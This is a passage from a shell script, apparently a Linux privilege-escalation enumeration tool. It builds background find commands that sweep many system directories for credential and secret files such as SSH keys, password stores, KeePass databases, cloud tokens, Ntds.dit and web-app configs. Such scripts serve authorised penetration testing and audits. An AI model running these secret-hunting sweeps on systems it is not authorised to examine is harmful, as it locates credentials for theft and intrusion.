/bin -type d -name \"ldap\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".cloudflared\" -o -name \"environments\" -o -name \"keyrings\" -o -name \"filezilla\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"neo4j\" -o -name \"cacti\" -o -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"zabbix\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \".password-store\" -o -name \"sentry\" -o -name \"mysql\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_CACHE=`eval_bckgrd "find /.cache -type d -name \"ldap\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".cloudflared\" -o -name \"environments\" -o -name \"keyrings\" -o -name \"filezilla\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"neo4j\" -o -name \"cacti\" -o -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"zabbix\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \".password-store\" -o -name \"sentry\" -o -name \"mysql\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_CDROM=`eval_bckgrd "find /cdrom -type d -name \"ldap\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".cloudflared\" -o -name \"environments\" -o -name \"keyrings\" -o -name \"filezilla\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"neo4j\" -o -name \"cacti\" -o -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"zabbix\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \".password-store\" -o -name \"sentry\" -o -name \"mysql\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_ETC=`eval_bckgrd "find /etc -type d -name \"ldap\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".cloudflared\" -o -name \"environments\" -o -name \"system-connections\" -o -name \"keyrings\" -o -name \"filezilla\" -o -name \"seeddms*\" -o -name \"system.d\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"bind\" -o -name \"neo4j\" -o -name \"cacti\" -o -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"zabbix\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \".password-store\" -o -name \"sentry\" -o -name \"mysql\" -o -name \"pam.d\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -type d -name \"ldap\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".cloudflared\" -o -name \"environments\" -o -name \"keyrings\" -o -name \"filezilla\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"neo4j\" -o -name \"cacti\" -o -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"zabbix\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \".password-store\" -o -name \"sentry\" -o -name \"mysql\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_MEDIA=`eval_bckgrd "find /media -type d -name \"ldap\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".cloudflared\" -o -name \"environments\" -o -name \"keyrings\" -o -name \"filezilla\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"neo4j\" -o -name \"cacti\" -o -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"zabbix\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \".password-store\" -o -name \"sentry\" -o -name \"mysql\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_MNT=`eval_bckgrd "find /mnt -type d -name \"ldap\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".cloudflared\" -o -name \"environments\" -o -name \"keyrings\" -o -name \"filezilla\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"neo4j\" -o -name \"cacti\" -o -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"zabbix\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \".password-store\" -o -name \"sentry\" -o -name \"mysql\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_OPT=`eval_bckgrd "find /opt -type d -name \"ldap\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".cloudflared\" -o -name \"environments\" -o -name \"keyrings\" -o -name \"filezilla\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"neo4j\" -o -name \"cacti\" -o -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"zabbix\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \".password-store\" -o -name \"sentry\" -o -name \"mysql\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_PRIVATE=`eval_bckgrd "find /private -type d -name \"ldap\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".cloudflared\" -o -name \"environments\" -o -name \"keyrings\" -o -name \"filezilla\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"neo4j\" -o -name \"cacti\" -o -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"zabbix\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \".password-store\" -o -name \"sentry\" -o -name \"mysql\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_SBIN=`eval_bckgrd "find /sbin -type d -name \"ldap\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".cloudflared\" -o -name \"environments\" -o -name \"keyrings\" -o -name \"filezilla\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"neo4j\" -o -name \"cacti\" -o -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"zabbix\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \".password-store\" -o -name \"sentry\" -o -name \"mysql\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_SNAP=`eval_bckgrd "find /snap -type d -name \"ldap\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".cloudflared\" -o -name \"environments\" -o -name \"keyrings\" -o -name \"filezilla\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"neo4j\" -o -name \"cacti\" -o -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"zabbix\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \".password-store\" -o -name \"sentry\" -o -name \"mysql\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_SRV=`eval_bckgrd "find /srv -type d -name \"ldap\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".cloudflared\" -o -name \"environments\" -o -name \"keyrings\" -o -name \"filezilla\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"neo4j\" -o -name \"cacti\" -o -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"zabbix\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \".password-store\" -o -name \"sentry\" -o -name \"mysql\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_TMP=`eval_bckgrd "find /tmp -type d -name \"ldap\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".cloudflared\" -o -name \"environments\" -o -name \"keyrings\" -o -name \"filezilla\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"neo4j\" -o -name \"cacti\" -o -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"zabbix\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \".password-store\" -o -name \"sentry\" -o -name \"mysql\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_USR=`eval_bckgrd "find /usr -type d -name \"ldap\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".cloudflared\" -o -name \"environments\" -o -name \"keyrings\" -o -name \"filezilla\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"bind\" -o -name \"neo4j\" -o -name \"cacti\" -o -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"zabbix\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \".password-store\" -o -name \"sentry\" -o -name \"mysql\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_VAR=`eval_bckgrd "find /var -type d -name \"ldap\" -o -name \"kube-proxy\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".cloudflared\" -o -name \"environments\" -o -name \"keyrings\" -o -name \"filezilla\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"bind\" -o -name \"neo4j\" -o -name \"kubelet\" -o -name \"cacti\" -o -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"zabbix\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \".password-store\" -o -name \"sentry\" -o -name \"mysql\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_APPLICATIONS=`eval_bckgrd "find /applications -name \"log4j-core*.jar\" -o -name \"influxdb.conf\" -o -name \"*.kdbx\" -o -name \"SAM\" -o -name \"*.db\" -o -name \"Dockerfile\" -o -name \"accessTokens.json\" -o -name \"*.sqlite\" -o -name \".google_authenticator\" -o -name \"KeePass.ini\" -o -name \"jetty-realm.properties\" -o -name \"authorized_keys\" -o -name \"software\" -o -name \".plan\" -o -name \"elasticsearch.y*ml\" -o -name \"*.cer\" -o -name \"server.xml\" -o -name \"*.gpg\" -o -name \".github\" -o -name \"passwd\" -o -name \"sites.ini\" -o -name \"unattend.inf\" -o -name \"rocketchat.service\" -o -name \"mariadb.cnf\" -o -name \".profile\" -o -name \"iis6.log\" -o -name \".gitconfig\" -o -name \".ldaprc\" -o -name \"zabbix_server.conf\" -o -name \"*.psk\" -o -name \"protecteduserkey.bin\" -o -name \".msmtprc\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"pgsql.conf\" -o -name \".recently-used.xbel\" -o -name \"system.sav\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \".bashrc\" -o -name \"hostapd.conf\" -o -name \"*.swp\" -o -name \".htpasswd\" -o -name \".sudo_as_admin_successful\" -o -name \".pypirc\" -o -name \"redis.conf\" -o -name \"datasources.xml\" -o -name \"ws_ftp.ini\" -o -name \"cesi.conf\" -o -name \"*password*\" -o -name \"pg_hba.conf\" -o -name \"AzureRMContext.json\" -o -name \"known_hosts\" -o -name \"ddclient.conf\" -o -name \"recentservers.xml\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"Ntds.dit\" -o -name \".k5login\" -o -name \"appcmd.exe\" -o -name \"printers.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"config.php\" -o -name \"krb5.conf\" -o -name \"wp-config.php\" -o -name \"ffftp.ini\" -o -name \"ipsec.secrets\" -o -name \"unattend.txt\" -o -name \"credentials\" -o -name \"error.log\" -o -name \"*.crt\" -o -name \".env\" -o -name \"tomcat-users.xml\" -o -name \"*config*.php\" -o -name \"*.csr\" -o -name \"*.keyring\" -o -name \"drives.xml\" -o -name \"winscp.ini\" -o -name \"id_rsa*\" -o -name \"access_tokens.db\" -o -name \"docker-compose.yml\" -o -name \"sentry.conf.py\" -o -name \"scclient.exe\" -o -name \"krb5.keytab\" -o -name \"sssd.conf\" -o -name \"rsyncd.secrets\" -o -name \".git-credentials\" -o -name \"TokenCache.dat\" -o -name \"settings.php\" -o -name \"*vnc*.xml\" -o -name \"psk.txt\" -o -name \"*.pfx\" -o -name \"passbolt.php\" -o -name \"wsl.exe\" -o -name \"php.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"access_tokens.json\" -o -name \"https.conf\" -o -name \"web*.config\" -o -name \"snmpd.conf\" -o -name \"rsyncd.conf\" -o -name \"bash.exe\" -o -name \"ftp.config\" -o -name \"kibana.y*ml\" -o -name \"000-default.conf\" -o -name \"db.php\" -o -name \"legacy_credentials.db\" -o -name \"scheduledtasks.xml\" -o -name \"SYSTEM\" -o -name \"ipsec.conf\" -o -name \"*.socket\" -o -name \"storage.php\" -o -name \"*.pem\" -o -name \"*.viminfo\" -o -name \".wgetrc\" -o -name \".lesshst\" -o -name \"RDCMan.settings\" -o -name \"credentials.db\" -o -name \"default.sav\" -o -name \".vault-token\" -o -name \"AppEvent.Evt\" -o -name \"gitlab.rm\" -o -name \"*.rdg\" -o -name \"gvm-tools.conf\" -o -name \"docker.sock\" -o -name \"*.jks\" -o -name \"wcx_ftp.ini\" -o -name \".secrets.mkey\" -o -name \"fastcgi_params\" -o -name \"id_dsa*\" -o -name \"KeePass.config*\" -o -name \"*.timer\" -o -name \"kcpassword\" -o -name \"index.dat\" -o -name \"mongod*.conf\" -o -name \"gitlab.yml\" -o -name \"postgresql.conf\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.gnupg\" -o -name \"autologin.conf\" -o -name \"setupinfo\" -o -name \"backup\" -o -name \"*.p12\" -o -name \"debian.cnf\" -o -name \"cloud.cfg\" -o -name \"ConsoleHost_history.txt\" -o -name \"setupinfo.bak\" -o -name \"*credential*\" -o -name \"kadm5.acl\" -o -name \"my.cnf\" -o -name \".erlang.cookie\" -o -name \"SecEvent.Evt\" -o -name \"*vnc*.txt\" -o -name \"mosquitto.conf\" -o -name \"*.sqlite3\" -o -name \"*.ftpconfig\" -o -name \"unattended.xml\" -o -name \"*vnc*.ini\" -o -name \"*.der\" -o -name \"secrets.ldb\" -o -name \"docker.socket\" -o -name \"groups.xml\" -o -name \"httpd.conf\" -o -name \"unattend.xml\" -o -name \"racoon.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"*_history*\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \".git\" -o -name \"*.pgp\" -o -name \"autologin\" -o -name \"backups\" -o -name \"filezilla.xml\" -o -name \"authorized_hosts\" -o -name \"NetSetup.log\" -o -name \"software.sav\" -o -name \"creds*\" -o -name \"ntuser.dat\" -o -name \"security.sav\" -o -name \"azureProfile.json\" -o -name \"access.log\" -o -name \".rhosts\" -o -name \"pagefile.sys\" -o -name \"https-xampp.conf\" -o -name \"pgadmin*.db\" -o -name \"*.keystore\" -o -name \"sysprep.xml\" -o -name \"*vnc*.c*nf*\" -o -name \"KeePass.enforced*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_BIN=`eval_bckgrd "find /bin -name \"log4j-core*.jar\" -o -name \"influxdb.conf\" -o -name \"*.kdbx\" -o -name \"SAM\" -o -name \"*.db\" -o -name \"Dockerfile\" -o -name \"accessTokens.json\" -o -name \"*.sqlite\" -o -name \".google_authenticator\" -o -name \"KeePass.ini\" -o -name \"jetty-realm.properties\" -o -name \"authorized_keys\" -o -name \"software\" -o -name \".plan\" -o -name \"elasticsearch.y*ml\" -o -name \"*.cer\" -o -name \"server.xml\" -o -name \"*.gpg\" -o -name \".github\" -o -name \"passwd\" -o -name \"sites.ini\" -o -name \"unattend.inf\" -o -name \"rocketchat.service\" -o -name \"mariadb.cnf\" -o -name \".profile\" -o -name \"iis6.log\" -o -name \".gitconfig\" -o -name \".ldaprc\" -o -name \"zabbix_server.conf\" -o -name \"*.psk\" -o -name \"protecteduserkey.bin\" -o -name \".msmtprc\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"pgsql.conf\" -o -name \".recently-used.xbel\" -o -name \"system.sav\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \".bashrc\" -o -name \"hostapd.conf\" -o -name \"*.swp\" -o -name \".htpasswd\" -o -name \".sudo_as_admin_successful\" -o -name \".pypirc\" -o -name \"redis.conf\" -o -name \"datasources.xml\" -o -name \"ws_ftp.ini\" -o -name \"cesi.conf\" -o -name \"*password*\" -o -name \"pg_hba.conf\" -o -name \"AzureRMContext.json\" -o -name \"known_hosts\" -o -name \"ddclient.conf\" -o -name \"recentservers.xml\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"Ntds.dit\" -o -name \".k5login\" -o -name \"appcmd.exe\" -o -name \"printers.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"config.php\" -o -name \"krb5.conf\" -o -name \"wp-config.php\" -o -name \"ffftp.ini\" -o -name \"ipsec.secrets\" -o -name \"unattend.txt\" -o -name \"credentials\" -o -name \"error.log\" -o -name \"*.crt\" -o -name \".env\" -o -name \"tomcat-users.xml\" -o -name \"*config*.php\" -o -name \"*.csr\" -o -name \"*.keyring\" -o -name \"drives.xml\" -o -name \"winscp.ini\" -o -name \"id_rsa*\" -o -name \"access_tokens.db\" -o -name \"docker-compose.yml\" -o -name \"sentry.conf.py\" -o -name \"scclient.exe\" -o -name \"krb5.keytab\" -o -name \"sssd.conf\" -o -name \"rsyncd.secrets\" -o -name \".git-credentials\" -o -name \"TokenCache.dat\" -o -name \"settings.php\" -o -name \"*vnc*.xml\" -o -name \"psk.txt\" -o -name \"*.pfx\" -o -name \"passbolt.php\" -o -name \"wsl.exe\" -o -name \"php.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"access_tokens.json\" -o -name \"https.conf\" -o -name \"web*.config\" -o -name \"snmpd.conf\" -o -name \"rsyncd.conf\" -o -name \"bash.exe\" -o -name \"ftp.config\" -o -name \"kibana.y*ml\" -o -name \"000-default.conf\" -o -name \"db.php\" -o -name \"legacy_credentials.db\" -o -name \"scheduledtasks.xml\" -o -name \"SYSTEM\" -o -name \"ipsec.conf\" -o -name \"*.socket\" -o -name \"storage.php\" -o -name \"*.pem\" -o -name \"*.viminfo\" -o -name \".wgetrc\" -o -name \".lesshst\" -o -name \"RDCMan.settings\" -o -name \"credentials.db\" -o -name \"default.sav\" -o -name \".vault-token\" -o -name \"AppEvent.Evt\" -o -name \"gitlab.rm\" -o -name \"*.rdg\" -o -name \"gvm-tools.conf\" -o -name \"docker.sock\" -o -name \"*.jks\" -o -name \"wcx_ftp.ini\" -o -name \".secrets.mkey\" -o -name \"fastcgi_params\" -o -name \"id_dsa*\" -o -name \"KeePass.config*\" -o -name \"*.timer\" -o -name \"kcpassword\" -o -name \"index.dat\" -o -name \"mongod*.conf\" -o -name \"gitlab.yml\" -o -name \"postgresql.conf\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.gnupg\" -o -name \"autologin.conf\" -o -name \"setupinfo\" -o -name \"backup\" -o -name \"*.p12\" -o -name \"debian.cnf\" -o -name \"cloud.cfg\" -o -name \"ConsoleHost_history.txt\" -o -name \"setupinfo.bak\" -o -name \"*credential*\" -o -name \"kadm5.acl\" -o -name \"my.cnf\" -o -name \".erlang.cookie\" -o -name \"SecEvent.Evt\" -o -name \"*vnc*.txt\" -o -name \"mosquitto.conf\" -o -name \"*.sqlite3\" -o -name \"*.ftpconfig\" -o -name \"unattended.xml\" -o -name \"*vnc*.ini\" -o -name \"*.der\" -o -name \"secrets.ldb\" -o -name \"docker.socket\" -o -name \"groups.xml\" -o -name \"httpd.conf\" -o -name \"unattend.xml\" -o -name \"racoon.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"*_history*\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \".git\" -o -name \"*.pgp\" -o -name \"autologin\" -o -name \"backups\" -o -name \"filezilla.xml\" -o -name \"authorized_hosts\" -o -name \"NetSetup.log\" -o -name \"software.sav\" -o -name \"creds*\" -o -name \"ntuser.dat\" -o -name \"security.sav\" -o -name \"azureProfile.json\" -o -name \"access.log\" -o -name \".rhosts\" -o -name \"pagefile.sys\" -o -name \"https-xampp.conf\" -o -name \"pgadmin*.db\" -o -name \"*.keystore\" -o -name \"sysprep.xml\" -o -name \"*vnc*.c*nf*\" -o -name \"KeePass.enforced*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_CACHE=`eval_bckgrd "find /.cache -name \"log4j-core*.jar\" -o -name \"influxdb.conf\" -o -name \"*.kdbx\" -o -name \"SAM\" -o -name \"*.db\" -o -name \"Dockerfile\" -o -name \"accessTokens.json\" -o -name \"*.sqlite\" -o -name \".google_authenticator\" -o -name \"KeePass.ini\" -o -name \"jetty-realm.properties\" -o -name \"authorized_keys\" -o -name \"software\" -o -name \".plan\" -o -name \"elasticsearch.y*ml\" -o -name \"*.cer\" -o -name \"server.xml\" -o -name \"*.gpg\" -o -name \".github\" -o -name \"passwd\" -o -name \"sites.ini\" -o -name \"unattend.inf\" -o -name \"rocketchat.service\" -o -name \"mariadb.cnf\" -o -name \".profile\" -o -name \"iis6.log\" -o -name \".gitconfig\" -o -name \".ldaprc\" -o -name \"zabbix_server.conf\" -o -name \"*.psk\" -o -name \"protecteduserkey.bin\" -o -name \".msmtprc\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"pgsql.conf\" -o -name \".recently-used.xbel\" -o -name \"system.sav\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \".bashrc\" -o -name \"hostapd.conf\" -o -name \"*.swp\" -o -name \".htpasswd\" -o -name \".sudo_as_admin_successful\" -o -name \".pypirc\" -o -name \"redis.conf\" -o -name \"datasources.xml\" -o -name \"ws_ftp.ini\" -o -name \"cesi.conf\" -o -name \"*password*\" -o -name \"pg_hba.conf\" -o -name \"AzureRMContext.json\" -o -name \"known_hosts\" -o -name \"ddclient.conf\" -o -name \"recentservers.xml\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"Ntds.dit\" -o -name \".k5login\" -o -name \"appcmd.exe\" -o -name \"printers.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"config.php\" -o -name \"krb5.conf\" -o -name \"wp-config.php\" -o -name \"ffftp.ini\" -o -name \"ipsec.secrets\" -o -name \"unattend.txt\" -o -name \"credentials\" -o -name \"error.log\" -o -name \"*.crt\" -o -name \".env\" -o -name \"tomcat-users.xml\" -o -name \"*config*.php\" -o -name \"*.csr\" -o -name \"*.keyring\" -o -name \"drives.xml\" -o -name \"winscp.ini\" -o -name \"id_rsa*\" -o -name \"access_tokens.db\" -o -name \"docker-compose.yml\" -o -name \"sentry.conf.py\" -o -name \"scclient.exe\" -o -name \"krb5.keytab\" -o -name \"sssd.conf\" -o -name \"rsyncd.secrets\" -o -name \".git-credentials\" -o -name \"TokenCache.dat\" -o -name \"settings.php\" -o -name \"*vnc*.xml\" -o -name \"psk.txt\" -o -name \"*.pfx\" -o -name \"passbolt.php\" -o -name \"wsl.exe\" -o -name \"php.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"access_tokens.json\" -o -name \"https.conf\" -o -name \"web*.config\" -o -name \"snmpd.conf\" -o -name \"rsyncd.conf\" -o -name \"bash.exe\" -o -name \"ftp.config\" -o -name \"kibana.y*ml\" -o -name \"000-default.conf\" -o -name \"db.php\" -o -name \"legacy_credentials.db\" -o -name \"scheduledtasks.xml\" -o -name \"SYSTEM\" -o -name \"ipsec.conf\" -o -name \"*.socket\" -o -name \"storage.php\" -o -name \"*.pem\" -o -name \"*.viminfo\" -o -name \".wgetrc\" -o -name \".lesshst\" -o -name \"RDCMan.settings\" -o -name \"credentials.db\" -o -name \"default.sav\" -o -name \".vault-token\" -o -name \"AppEvent.Evt\" -o -name \"gitlab.rm\" -o -name \"*.rdg\" -o -name \"gvm-tools.conf\" -o -name \"docker.sock\" -o -name \"*.jks\" -o -name \"wcx_ftp.ini\" -o -name \".secrets.mkey\" -o -name \"fastcgi_params\" -o -name \"id_dsa*\" -o -name \"KeePass.config*\" -o -name \"*.timer\" -o -name \"kcpassword\" -o -name \"index.dat\" -o -name \"mongod*.conf\" -o -name \"gitlab.yml\" -o -name \"postgresql.conf\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.gnupg\" -o -name \"autologin.conf\" -o -name \"setupinfo\" -o -name \"backup\" -o -name \"*.p12\" -o -name \"debian.cnf\" -o -name \"cloud.cfg\" -o -name \"ConsoleHost_history.txt\" -o -name \"setupinfo.bak\" -o -name \"*credential*\" -o -name \"kadm5.acl\" -o -name \"my.cnf\" -o -name \".erlang.cookie\" -o -name \"SecEvent.Evt\" -o -name \"*vnc*.txt\" -o -name \"mosquitto.conf\" -o -name \"*.sqlite3\" -o -name \"*.ftpconfig\" -o -name \"unattended.xml\" -o -name \"*vnc*.ini\" -o -name \"*.der\" -o -name \"secrets.ldb\" -o -name \"docker.socket\" -o -name \"groups.xml\" -o -name \"httpd.conf\" -o -name \"unattend.xml\" -o -name \"racoon.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"*_history*\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \".git\" -o -name \"*.pgp\" -o -name \"autologin\" -o -name \"backups\" -o -name \"filezilla.xml\" -o -name \"authorized_hosts\" -o -name \"NetSetup.log\" -o -name \"software.sav\" -o -name \"creds*\" -o -name \"ntuser.dat\" -o -name \"security.sav\" -o -name \"azureProfile.json\" -o -name \"access.log\" -o -name \".rhosts\" -o -name \"pagefile.sys\" -o -name \"https-xampp.conf\" -o -name \"pgadmin*.db\" -o -name \"*.keystore\" -o -name \"sysprep.xml\" -o -name \"*vnc*.c*nf*\" -o -name \"KeePass.enforced*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_CDROM=`eval_bckgrd "find /cdrom -name \"log4j-core*.jar\" -o -name \"influxdb.conf\" -o -name \"*.kdbx\" -o -name \"SAM\" -o -name \"*.db\" -o -name \"Dockerfile\" -o -name \"accessTokens.json\" -o -name \"*.sqlite\" -o -name \".google_authenticator\" -o -name \"KeePass.ini\" -o -name \"jetty-realm.properties\" -o -name \"authorized_keys\" -o -name \"software\" -o -name \".plan\" -o -name \"elasticsearch.y*ml\" -o -name \"*.cer\" -o -name \"server.xml\" -o -name \"*.gpg\" -o -name \".github\" -o -name \"passwd\" -o -name \"sites.ini\" -o -name \"unattend.inf\" -o -name \"rocketchat.service\" -o -name \"mariadb.cnf\" -o -name \".profile\" -o -name \"iis6.log\" -o -name \".gitconfig\" -o -name \".ldaprc\" -o -name \"zabbix_server.conf\" -o -name \"*.psk\" -o -name \"protecteduserkey.bin\" -o -name \".msmtprc\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"pgsql.conf\" -o -name \".recently-used.xbel\" -o -name \"system.sav\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \".bashrc\" -o -name \"hostapd.conf\" -o -name \"*.swp\" -o -name \".htpasswd\" -o -name \".sudo_as_admin_successful\" -o -name \".pypirc\" -o -name \"redis.conf\" -o -name \"datasources.xml\" -o -name \"ws_ftp.ini\" -o -name \"cesi.conf\" -o -name \"*password*\" -o -name \"pg_hba.conf\" -o -name \"AzureRMContext.json\" -o -name \"known_hosts\" -o -name \"ddclient.conf\" -o -name \"recentservers.xml\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"Ntds.dit\" -o -name \".k5login\" -o -name \"appcmd.exe\" -o -name \"printers.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"config.php\" -o -name \"krb5.conf\" -o -name \"wp-config.php\" -o -name \"ffftp.ini\" -o -name \"ipsec.secrets\" -o -name \"unattend.txt\" -o -name \"credentials\" -o -name \"error.log\" -o -name \"*.crt\" -o -name \".env\" -o -name \"tomcat-users.xml\" -o -name \"*config*.php\" -o -name \"*.csr\" -o -name \"*.keyring\" -o -name \"drives.xml\" -o -name \"winscp.ini\" -o -name \"id_rsa*\" -o -name \"access_tokens.db\" -o -name \"docker-compose.yml\" -o -name \"sentry.conf.py\" -o -name \"scclient.exe\" -o -name \"krb5.keytab\" -o -name \"sssd.conf\" -o -name \"rsyncd.secrets\" -o -name \".git-credentials\" -o -name \"TokenCache.dat\" -o -name \"settings.php\" -o -name \"*vnc*.xml\" -o -name \"psk.txt\" -o -name \"*.pfx\" -o -name \"passbolt.php\" -o -name \"wsl.exe\" -o -name \"php.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"access_tokens.json\" -o -name \"https.conf\" -o -name \"web*.config\" -o -name \"snmpd.conf\" -o -name \"rsyncd.conf\" -o -name \"bash.exe\" -o -name \"ftp.config\" -o -name \"kibana.y*ml\" -o -name \"000-default.conf\" -o -name \"db.php\" -o -name \"legacy_credentials.db\" -o -name \"scheduledtasks.xml\" -o -name \"SYSTEM\" -o -name \"ipsec.conf\" -o -name \"*.socket\" -o -name \"storage.php\" -o -name \"*.pem\" -o -name \"*.viminfo\" -o -name \".wgetrc\" -o -name \".lesshst\" -o -name \"RDCMan.settings\" -o -name \"credentials.db\" -o -name \"default.sav\" -o -name \".vault-token\" -o -name \"AppEvent.Evt\" -o -name \"gitlab.rm\" -o -name \"*.rdg\" -o -name \"gvm-tools.conf\" -o -name \"docker.sock\" -o -name \"*.jks\" -o -name \"wcx_ftp.ini\" -o -name \".secrets.mkey\" -o -name \"fastcgi_params\" -o -name \"id_dsa*\" -o -name \"KeePass.config*\" -o -name \"*.timer\" -o -name \"kcpassword\" -o -name \"index.dat\" -o -name \"mongod*.conf\" -o -name 